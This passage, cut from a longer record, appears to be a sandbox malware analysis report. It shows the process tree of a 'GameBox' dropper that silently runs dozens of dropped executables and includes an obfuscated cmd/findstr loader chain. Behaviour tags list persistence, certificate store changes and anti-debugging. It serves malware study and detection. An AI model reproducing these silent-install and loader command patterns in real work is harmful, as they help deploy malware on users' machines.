                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279843 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                          4⤵
                                                            PID:7896
                                                        • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                          "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:3576
                                                          • C:\Users\Admin\AppData\Local\Temp\is-J4HAS.tmp\WEATHER Manager.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-J4HAS.tmp\WEATHER Manager.tmp" /SL5="$3026C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:5192
                                                            • C:\Users\Admin\AppData\Local\Temp\is-C30QK.tmp\Setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-C30QK.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                              5⤵
                                                              • Loads dropped DLL
                                                              • Enumerates connected drives
                                                              • Modifies system certificate store
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:6548
                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-C30QK.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-C30QK.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279843 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                6⤵
                                                                  PID:7888
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            • Drops file in Program Files directory
                                                            PID:968
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:4908
                                                            • C:\Users\Admin\AppData\Local\Temp\is-G5JIN.tmp\MediaBurner2.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-G5JIN.tmp\MediaBurner2.tmp" /SL5="$202DA,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              PID:5408
                                                              • C:\Users\Admin\AppData\Local\Temp\is-06O8B.tmp\3377047_logo_media.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-06O8B.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                5⤵
                                                                • Drops file in Drivers directory
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                PID:5728
                                                                • C:\Program Files\Windows Multimedia Platform\EBZKYSUMYC\ultramediaburner.exe
                                                                  "C:\Program Files\Windows Multimedia Platform\EBZKYSUMYC\ultramediaburner.exe" /VERYSILENT
                                                                  6⤵
                                                                    PID:6736
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-HE0QP.tmp\ultramediaburner.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-HE0QP.tmp\ultramediaburner.tmp" /SL5="$105A8,281924,62464,C:\Program Files\Windows Multimedia Platform\EBZKYSUMYC\ultramediaburner.exe" /VERYSILENT
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:1848
                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                        8⤵
                                                                          PID:6636
                                                                    • C:\Users\Admin\AppData\Local\Temp\a0-5f669-9be-cb487-3c21213426d57\Maehedolumi.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\a0-5f669-9be-cb487-3c21213426d57\Maehedolumi.exe"
                                                                      6⤵
                                                                      • Checks computer location settings
                                                                      PID:4636
                                                                    • C:\Users\Admin\AppData\Local\Temp\a3-e67f9-c85-f77bd-c4de3e08631d1\Washesozhaejae.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\a3-e67f9-c85-f77bd-c4de3e08631d1\Washesozhaejae.exe"
                                                                      6⤵
                                                                        PID:6708
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pko131bs.kku\GcleanerEU.exe /eufive & exit
                                                                          7⤵
                                                                            PID:7320
                                                                            • C:\Users\Admin\AppData\Local\Temp\pko131bs.kku\GcleanerEU.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\pko131bs.kku\GcleanerEU.exe /eufive
                                                                              8⤵
                                                                                PID:6696
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmhwrq2t.onv\installer.exe /qn CAMPAIGN="654" & exit
                                                                              7⤵
                                                                                PID:7880
                                                                                • C:\Users\Admin\AppData\Local\Temp\kmhwrq2t.onv\installer.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\kmhwrq2t.onv\installer.exe /qn CAMPAIGN="654"
                                                                                  8⤵
                                                                                    PID:7356
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cvgdfagd.yit\ufgaa.exe & exit
                                                                                  7⤵
                                                                                    PID:7268
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wqwogbkv.ovq\anyname.exe & exit
                                                                                    7⤵
                                                                                      PID:6740
                                                                                      • C:\Users\Admin\AppData\Local\Temp\wqwogbkv.ovq\anyname.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\wqwogbkv.ovq\anyname.exe
                                                                                        8⤵
                                                                                          PID:7764
                                                                                          • C:\Users\Admin\AppData\Local\Temp\wqwogbkv.ovq\anyname.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\wqwogbkv.ovq\anyname.exe" -q
                                                                                            9⤵
                                                                                              PID:6816
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lydgng2v.olc\gcleaner.exe /mixfive & exit
                                                                                          7⤵
                                                                                            PID:7884
                                                                                            • C:\Users\Admin\AppData\Local\Temp\lydgng2v.olc\gcleaner.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\lydgng2v.olc\gcleaner.exe /mixfive
                                                                                              8⤵
                                                                                                PID:7172
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1olfkmsi.z05\autosubplayer.exe /S & exit
                                                                                              7⤵
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:7324
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5144
                                                                                      • C:\Users\Admin\AppData\Roaming\5405779.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\5405779.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5016
                                                                                      • C:\Users\Admin\AppData\Roaming\4158601.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\4158601.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                        PID:4164
                                                                                      • C:\Users\Admin\AppData\Roaming\4272591.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\4272591.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5800
                                                                                      • C:\Users\Admin\AppData\Roaming\2100418.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\2100418.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4152
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks computer location settings
                                                                                      PID:5280
                                                                                      • C:\Users\Admin\Documents\8pccUR5NcrvJdpdQmCTxTxVD.exe
                                                                                        "C:\Users\Admin\Documents\8pccUR5NcrvJdpdQmCTxTxVD.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:5268
                                                                                      • C:\Users\Admin\Documents\pEiiE8cI2fGQLLiggGuLd5PL.exe
                                                                                        "C:\Users\Admin\Documents\pEiiE8cI2fGQLLiggGuLd5PL.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5220
                                                                                      • C:\Users\Admin\Documents\aIngq3hW3Agtjz0WoYfqcQZX.exe
                                                                                        "C:\Users\Admin\Documents\aIngq3hW3Agtjz0WoYfqcQZX.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1852
                                                                                        • C:\Users\Admin\Documents\aIngq3hW3Agtjz0WoYfqcQZX.exe
                                                                                          "C:\Users\Admin\Documents\aIngq3hW3Agtjz0WoYfqcQZX.exe"
                                                                                          5⤵
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:8244
                                                                                      • C:\Users\Admin\Documents\G7DIbHmo59s6CvMO38VbWj5m.exe
                                                                                        "C:\Users\Admin\Documents\G7DIbHmo59s6CvMO38VbWj5m.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:1760
                                                                                      • C:\Users\Admin\Documents\427dfZOSSrP1Lo2UySFvqXG9.exe
                                                                                        "C:\Users\Admin\Documents\427dfZOSSrP1Lo2UySFvqXG9.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5784
                                                                                        • C:\Users\Admin\AppData\Roaming\3842896.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\3842896.exe"
                                                                                          5⤵
                                                                                            PID:4468
                                                                                          • C:\Users\Admin\AppData\Roaming\4857158.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\4857158.exe"
                                                                                            5⤵
                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                            PID:6356
                                                                                        • C:\Users\Admin\Documents\8PtV0hT6nIOEOYWZu_N3vDwU.exe
                                                                                          "C:\Users\Admin\Documents\8PtV0hT6nIOEOYWZu_N3vDwU.exe"
                                                                                          4⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3632
                                                                                          • C:\Users\Admin\Documents\8PtV0hT6nIOEOYWZu_N3vDwU.exe
                                                                                            C:\Users\Admin\Documents\8PtV0hT6nIOEOYWZu_N3vDwU.exe
                                                                                            5⤵
                                                                                              PID:6112
                                                                                          • C:\Users\Admin\Documents\XPQFUDn6DwXnCtDfWoXQGIDT.exe
                                                                                            "C:\Users\Admin\Documents\XPQFUDn6DwXnCtDfWoXQGIDT.exe"
                                                                                            4⤵
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:3328
                                                                                          • C:\Users\Admin\Documents\jPxT8V0PlvA0gITYcJbxyiHX.exe
                                                                                            "C:\Users\Admin\Documents\jPxT8V0PlvA0gITYcJbxyiHX.exe"
                                                                                            4⤵
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:1628
                                                                                          • C:\Users\Admin\Documents\Dz4MYRXnp_ph0ky58Fplr9ym.exe
                                                                                            "C:\Users\Admin\Documents\Dz4MYRXnp_ph0ky58Fplr9ym.exe"
                                                                                            4⤵
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:2920
                                                                                          • C:\Users\Admin\Documents\xKY8wTnE3O0bIDQo94INIp89.exe
                                                                                            "C:\Users\Admin\Documents\xKY8wTnE3O0bIDQo94INIp89.exe"
                                                                                            4⤵
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:1256
                                                                                          • C:\Users\Admin\Documents\KczMpChsFACcmxEtKnyIN7Kh.exe
                                                                                            "C:\Users\Admin\Documents\KczMpChsFACcmxEtKnyIN7Kh.exe"
                                                                                            4⤵
                                                                                              PID:2820
                                                                                            • C:\Users\Admin\Documents\y1zbD3v3ueFwlrbTrKoho_BL.exe
                                                                                              "C:\Users\Admin\Documents\y1zbD3v3ueFwlrbTrKoho_BL.exe"
                                                                                              4⤵
                                                                                                PID:60
                                                                                              • C:\Users\Admin\Documents\sglMQpLn7jK5glfLdA60qNMb.exe
                                                                                                "C:\Users\Admin\Documents\sglMQpLn7jK5glfLdA60qNMb.exe"
                                                                                                4⤵
                                                                                                  PID:1060
                                                                                                • C:\Users\Admin\Documents\ITg2xLGsrrtzruDLlDtr0hTq.exe
                                                                                                  "C:\Users\Admin\Documents\ITg2xLGsrrtzruDLlDtr0hTq.exe"
                                                                                                  4⤵
                                                                                                    PID:2548
                                                                                                  • C:\Users\Admin\Documents\ZoaI0vN3D7ueNA2xg1bu28TW.exe
                                                                                                    "C:\Users\Admin\Documents\ZoaI0vN3D7ueNA2xg1bu28TW.exe"
                                                                                                    4⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:5672
                                                                                                    • C:\Users\Admin\Documents\ZoaI0vN3D7ueNA2xg1bu28TW.exe
                                                                                                      C:\Users\Admin\Documents\ZoaI0vN3D7ueNA2xg1bu28TW.exe
                                                                                                      5⤵
                                                                                                        PID:7136
                                                                                                    • C:\Users\Admin\Documents\G36axIKCPUDiImaGeU44iBaE.exe
                                                                                                      "C:\Users\Admin\Documents\G36axIKCPUDiImaGeU44iBaE.exe"
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3000
                                                                                                    • C:\Users\Admin\Documents\zGWifSu3iBJFKtFgXpyaTXyw.exe
                                                                                                      "C:\Users\Admin\Documents\zGWifSu3iBJFKtFgXpyaTXyw.exe"
                                                                                                      4⤵
                                                                                                        PID:5840
                                                                                                      • C:\Users\Admin\Documents\GdWaZpyp5X8qRyp9AAXsf_Wi.exe
                                                                                                        "C:\Users\Admin\Documents\GdWaZpyp5X8qRyp9AAXsf_Wi.exe"
                                                                                                        4⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:5580
                                                                                                        • C:\Users\Admin\Documents\GdWaZpyp5X8qRyp9AAXsf_Wi.exe
                                                                                                          C:\Users\Admin\Documents\GdWaZpyp5X8qRyp9AAXsf_Wi.exe
                                                                                                          5⤵
                                                                                                            PID:7040
                                                                                                        • C:\Users\Admin\Documents\bgQ0ruhNXrFc1iMGcUDUXj_y.exe
                                                                                                          "C:\Users\Admin\Documents\bgQ0ruhNXrFc1iMGcUDUXj_y.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5208
                                                                                                          • C:\Users\Admin\Documents\bgQ0ruhNXrFc1iMGcUDUXj_y.exe
                                                                                                            "C:\Users\Admin\Documents\bgQ0ruhNXrFc1iMGcUDUXj_y.exe" -q
                                                                                                            5⤵
                                                                                                              PID:1776
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5228
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmp83A9_tmp.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\tmp83A9_tmp.exe"
                                                                                                            4⤵
                                                                                                              PID:5972
                                                                                                              • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                "C:\Windows\System32\dllhost.exe"
                                                                                                                5⤵
                                                                                                                  PID:796
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                  5⤵
                                                                                                                    PID:1700
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd
                                                                                                                      6⤵
                                                                                                                        PID:6428
                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                          findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                          7⤵
                                                                                                                            PID:7312
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                            Esplorarne.exe.com i
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                            PID:8084
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                              8⤵
                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                              PID:7984
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                9⤵
                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                PID:7668
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                  10⤵
                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                  PID:7568
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                    11⤵
                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                    PID:6712
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                      12⤵
                                                                                                                                        PID:8140
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                          13⤵
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:5632
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                            14⤵
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:7920
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                              15⤵
                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                              PID:7968
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                16⤵
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:7524
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                  17⤵
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:7676
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    18⤵
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:7888
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                      19⤵
                                                                                                                                                        PID:7860
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                          20⤵
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:8000
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            21⤵
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:4892
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              22⤵
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:2368
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                23⤵
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:6696
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  24⤵
                                                                                                                                                                    PID:4844
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      25⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:8036
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        26⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:1240
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          27⤵
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:4844
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            28⤵
                                                                                                                                                                              PID:7176
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                29⤵
                                                                                                                                                                                  PID:5708
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                    30⤵
                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                    PID:7860
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      31⤵
                                                                                                                                                                                        PID:6204
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          32⤵
                                                                                                                                                                                            PID:7556
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                              33⤵
                                                                                                                                                                                                PID:7440
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                  34⤵
                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  PID:7876
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                    35⤵
                                                                                                                                                                                                      PID:2940
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                        36⤵
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                        PID:7428
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                          37⤵
                                                                                                                                                                                                            PID:6372
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                              38⤵
                                                                                                                                                                                                                PID:6844
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                  39⤵
                                                                                                                                                                                                                    PID:5628
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                      40⤵
                                                                                                                                                                                                                        PID:6664
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                          41⤵
                                                                                                                                                                                                                            PID:6540
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                              42⤵
                                                                                                                                                                                                                                PID:4224
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
